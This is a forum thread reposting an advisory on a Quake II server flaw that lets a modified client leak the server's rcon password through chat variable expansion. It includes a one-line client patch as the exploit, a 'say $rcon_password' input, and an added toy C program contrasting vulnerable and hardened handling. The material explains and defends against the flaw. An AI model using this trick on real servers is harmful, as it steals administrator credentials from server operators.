Thread: Vulnerability: id Software Quake II Server Remote Information Disclosure

  1. #1
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    Vulnerability: id Software Quake II Server Remote Information Disclosure

    A vulnerability has been reported in some versions of the Quake II server.

    While variable expansion is normally performed on the client side, a modified client may pass unexpanded variables such as $rcon_password to the server. The server will expand these variables within its local context, potentially leaking sensitive information to the remote attacker.

    Remote: Yes

    Exploit: Redix has contributed exploit details:

    you must modify your q2 client so that the client will not replace the $... variables in says
    quick hack:
    in qcommon/cmd.c
    change the line
    Cmd_TokenizeString (text, true);
    to
    Cmd_TokenizeString( text, false);

    Threshold
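
Added example, not part of the original thread and not id Software's code: a toy C model of the flaw described in post #1, showing text from a remote client being expanded in the server's variable context next to a hardened path that leaves `$...` literal. The variable table, its values and the function names (`tokenize`, `relay_chat_vulnerable`, `relay_chat_hardened`) are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Constructed server-side variable table (toy stand-in for server variables). */
struct cvar { const char *name, *value; };
static const struct cvar cvars[] = {
    { "rcon_password", "s3cret-constructed" },
    { "hostname",      "demo-server" },
};

static const char *cvar_lookup(const char *name, size_t len) {
    for (size_t i = 0; i < sizeof cvars / sizeof cvars[0]; i++)
        if (strlen(cvars[i].name) == len && !strncmp(cvars[i].name, name, len))
            return cvars[i].value;
    return "";  /* unknown variables expand to nothing */
}

/* Copy `in` to `out`; replace $name with its value only when `expand` is set. */
static void tokenize(const char *in, int expand, char *out, size_t cap) {
    size_t o = 0;
    while (*in && o + 1 < cap) {
        if (expand && *in == '$') {
            const char *start = ++in;
            while (isalnum((unsigned char)*in) || *in == '_') in++;
            const char *v = cvar_lookup(start, (size_t)(in - start));
            while (*v && o + 1 < cap) out[o++] = *v++;
        } else {
            out[o++] = *in++;
        }
    }
    out[o] = '\0';
}

/* Remote client text is untrusted and gets relayed back out to players. */
void relay_chat_vulnerable(const char *from_client, char *out, size_t cap) {
    tokenize(from_client, 1, out, cap);  /* expands in the server's context */
}
void relay_chat_hardened(const char *from_client, char *out, size_t cap) {
    tokenize(from_client, 0, out, cap);  /* "$..." stays literal */
}

int main(void) {
    char buf[128];
    relay_chat_vulnerable("say $rcon_password", buf, sizeof buf);
    printf("vulnerable: %s\n", buf);
    relay_chat_hardened("say $rcon_password", buf, sizeof buf);
    printf("hardened:   %s\n", buf);
    return 0;
}
```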

  2. #2
    pretty cool how people figure these things out
    "Drastic times call for drastic measures."

  3. #3
    Senior Member cwk9's Avatar
    Join Date
    Feb 2002
    Posts
    1,207
    Games are an often overlooked security risk. Although it’s mostly limited to crashing your computer or dropping you from the server but still something to be mindful of.
    It's not software piracy. I’m just making multiple off site backups.
